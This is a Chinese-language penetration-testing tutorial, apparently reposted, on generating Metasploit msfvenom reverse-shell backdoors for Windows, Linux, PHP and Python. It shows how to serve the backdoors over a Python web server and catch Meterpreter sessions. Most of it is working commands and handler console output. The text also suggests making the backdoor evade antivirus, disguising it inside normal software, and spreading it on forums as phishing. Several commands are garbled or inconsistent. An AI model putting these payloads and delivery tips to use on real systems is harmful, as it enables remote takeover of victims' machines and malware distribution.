失眠网,内容丰富有趣,生活中的好帮手!
失眠网 > 渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

时间:2024-07-27 00:58:06

相关推荐

渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)

MsfVenom

首先msf就是Metaaploit,venom就是病毒。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。进一步来说,msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。

Msfvenom使用

>生成后门

#msfvenom在bash shell里使用,不是msf终端,

如果我们不清楚msfvenom到如何使用,可以输入msfvenom -h来查看帮助,msfvenom支持各种操作平台,各种脚本语言的木马的生成,在生成时需要你指定一种类型,比如说你要生成windows的,或者是Linux的,等等。

windows可执行程序后门:msfvenom-p windows/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux可执行程序后门:msfvenom-p linux/x64/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

php脚本后门:msfvenom -p php/meterpreter/reverse tcp LHOST =<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

python脚本后门:msfvenom-p python/meterpreter/reverse tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

有关命令的一些参数:

在执行代码后我们查看一下生成的文件:

那么生成完成木马后门了,我们如何传输,就是如何将生成的exe可执行文件发送给目标机器,这里我们有一个通用的方法,就是利用python快速开启一个web服务,python3 -m http.server

之后我们打开一个网页,输入192.168.164.130:8000/demo.exe就会弹出一个下载提示,点击下载就完成了我们的一个木马传输。

需要注意的是:一定要输入自己kali的IP地址,还有就是冒号后面的端口靠一定要和你所开启的端口号一致,像是上面我们默认的开启的8000,然而你也可以自己设置开启的端口号,在命令后面加上端口号就行。还有为什么后面是加上/demo.exe就可以发现文件,是因为我们生成的木马文件一般都自动保存在了home目录,如果是在其他目录下,只需要在文件前面加上你自己保存的路径即可。

或者你还可以利用其他传播方式,比如说你对这个后门进行了免杀,伪装,或者是注入嵌入到其他正常的软件,然后在社区论坛,贴吧上面进行广泛的传播。这些就是钓鱼的一个方式。

>开启监听

>攻击机监听

msf6 >use exploit/multi/handler

[*] Using configured payload generic/shell reverse_tcp

msf6 exploit(multi/handler) >set payload windows/x64/meterpreter/reverse_tcp

payload =>windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) >set Ihost 192.168.164.130

lhost =>192.168.123.159

msf6 exploit(multi/handler) >set lport 9999

lport =>9999

msf6 exploit(multi/handler) >run

[*] Started reverse TCP handler on 192.168.164.130:9999

上面我们是成功完成了一个木马后门的生成和传输,但是我们对于这个9999端口的监听并没有打开,我们需要进入msf来进行监听。

进入msf以后我们需要使用一个模块,useexploit/multi/handler,这个模块就是为了去开启一个监听端口,然后我们需要对模块进行设置,首先要设置payload为我们生成后门时使用的payload相同,set payloadwindows/x64/meterpreter/reverse_tcp,设置lhost,set lhost 192.168.164.130,设置lport,set lport 9999,设置完成后我们可以查看一下:可以看到是没有任何问题的。

run运行模块就可以开启监听了,然后我们转到靶机运行一下demo.exe,返回kali可以看到我们直接获取到了一个meterpreter会话,拿到了权限。

Msfvenom查看

上面我们是针对windows来生成了一个木马后面,但是有时候我们不一定知道我们要生成的都有那些参数,比如说我们要攻击Android,我不知道要生成什么样的可执行文件,甚至我压根不知道payload要选什么,我怎么知道这个payload有这么几个参数要设置呢?那我们什么都不知道的情况下该如何查看我们所需要的内容,这时候msfvenom可以使用命令来进行查看:

#查看msfvenom支持的格式:msfvenom -lformats

#查看msfvenom支持的攻击载荷:msfvenom -I payloads针对win:msfvenom -l payloads |grepwindows

#查看msfvenom支持的编码:msfvenom -l encoders

#查看payload的信息与设置:msfvenom -p cmd/windows/adduser --list-options

>Linux

我们再来看一下对于Linux如何操作。其实和windows区别并不大

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.164.130 lport=8888 -f elf -o linux_demo.elfuseexploit/multi/handlerset payloadinux/x64/meterpreter/reverse_tcp,set lhost 192.168.164.130,set lport 8888runpython3 -m http.server转到Linux靶机,wget http://192.168.164.130:8000/linux_demo.elf运行linux_demo.elf

综上所述我们得到了两个meterpreter,分别是windows的和linux的。

如果觉得《渗透测试Metasploit框架体验(3. MsfVenom生成后门木马)》对你有帮助,请点赞、收藏,并留下你的观点哦!

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。